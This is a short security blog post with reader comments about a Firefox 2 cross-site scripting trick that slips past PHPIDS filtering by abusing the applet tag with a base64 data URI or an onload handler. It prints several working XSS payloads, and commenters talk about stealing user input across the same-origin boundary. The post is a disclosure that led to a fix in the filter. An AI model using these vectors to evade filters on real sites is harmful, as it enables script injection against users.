Firefox applet fun

I’ve been hacking the PHPIDS recently and I wanted a pure XSS vector not just script execution, I decided to experiment with the applet tag because it sneaks past the malicious tag detection. I thought to myself I wonder if it accepts the type attribute like the object tag does….

<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3N
jcmlwdD4" type=text/html>

That works it executes the base64 encoded string as HTML! It doesn’t stop there though πŸ™‚

<applet src="http://www.businessinfo.co.uk" type=text/html>

The applet tag even acts like a iframe πŸ˜€

13 Responses to “Firefox applet fun”

  1. ehmo writes:

    hey man, nice find.

  2. Gareth Heyes writes:

    @ehmo

    Thx, it was fun to find πŸ™‚

  3. Gareth Heyes writes:

    Here’s a shortened XSS vector:-
    <applet/src/type=text/html onload=alert(1)

  4. daniel writes:

    My only issue would be sites that use strict XHTML, this would be rendered useless, no?

  5. Gareth Heyes writes:

    @daniel

    I ran a test in strict html and it still seemed to work

  6. daniel writes:

    interesting, damn good find then sir!

  7. Alex writes:

    Which version of Firefox did you use ? I tried it with Firefox 3 RC1 and it didn’t work.

  8. Gareth Heyes writes:

    @Alex

    Not tried with beta but it works with latest FF2

  9. Alex writes:

    I’ve tested it with the latest FF2. Now it works.
    It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal userinput from within this “iframe”.

  10. Gareth Heyes writes:

    @Alex

    Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested on how to do it πŸ™‚

  11. Alex writes:

    I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.

  12. .mario writes:

    Nice stuff Gareth – finally a “real” XSS again πŸ˜‰ Has been a pretty long time. The issues are fixed in the trunk – 0.4.8 as soon as I return from OWASP Europe.

  13. Gareth Heyes writes:

    @.mario

    Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find πŸ˜€ good luck with the conference